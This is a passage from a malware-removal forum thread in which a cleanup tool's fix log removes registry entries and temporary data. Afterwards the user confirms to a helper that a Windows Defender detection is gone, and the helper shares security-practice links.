HKLM\Software\Classes\CLSID\{FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} => key not found. 
HKLM\Software\Wow6432Node\Mozilla\Thunderbird\Extensions\\msktbird@mcafee.com => value removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\Software\Mozilla\Firefox\Extensions\\{e4f94d1e-2f53-401e-8885-681602c0ddd8} => value not found.
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09] => Error: No automatic fix found for this entry.
CHR Extension: (Chrome Media Router) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09] => Error: No automatic fix found for this entry.
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2} => key removed successfully
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF} => key removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1 => key removed successfully
HKLM\Software\Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2 => key removed successfully
HKLM\Software\Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3 => key removed successfully
HKLM\Software\Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => key removed successfully
HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1 => key removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2 => key removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3 => key removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found. 
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => key removed successfully
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => key not found. 
C:\WINDOWS\system32\Drivers\btmhsf.sys => ":Microsoft_Appcompat_ReinstallUpgrade" ADS removed successfully.
C:\Users\Gaya\Desktop\IMG_20140804_123230.jpg => ":com.dropbox.attributes" ADS removed successfully.
C:\Users\Ligaya\Desktop\TRAVEL.txt => ":com.dropbox.attributes" ADS removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{09E0091B-10DA-4E55-B2DD-33EA7B981580}C:\windows\kmsemulator.exe => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{3A914466-2DAE-4ED6-B1C6-0540889488B6}C:\windows\kmsemulator.exe => value removed successfully
"C:\windows\kmsemulator.exe" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 21449757 B
Java, Flash, Steam htmlcache => 2393 B
Windows/system/drivers => 2158731551 B
Edge => 0 B
Chrome => 699088197 B
Firefox => 377690272 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 947046 B
NetworkService => 10209314 B
UpdatusUser => 0 B
Gaya => 8540488 B
Ligaya => 2374687602 B
 
RecycleBin => 0 B
EmptyTemp: => 5.3 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 10:56:15 ====


#4 nasdaq

nasdaq

  • Malware Response Team
  • 39,962 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:12:16 PM

Posted 22 August 2017 - 08:00 AM

Has your problem been solved?

#5 Gaya19

Gaya19
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:12:16 AM

Posted 22 August 2017 - 08:26 AM

Hi Nasdaq. Since my last message, I've tried booting my computer 2-3 times and Behavior:Win32/Powemet.B!attk has no longer been detected by Windows Defender, so I guess the problem has been solved. Thank you very much! I really appreciate it.



#6 nasdaq

nasdaq

  • Malware Response Team
  • 39,962 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:12:16 PM

Posted 22 August 2017 - 12:44 PM

If all is well.

To learn more about how to protect yourself while on the internet read this little guide best security practices keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/


https://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
Simple and easy ways to keep your computer safe and secure on the Internet.
==




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users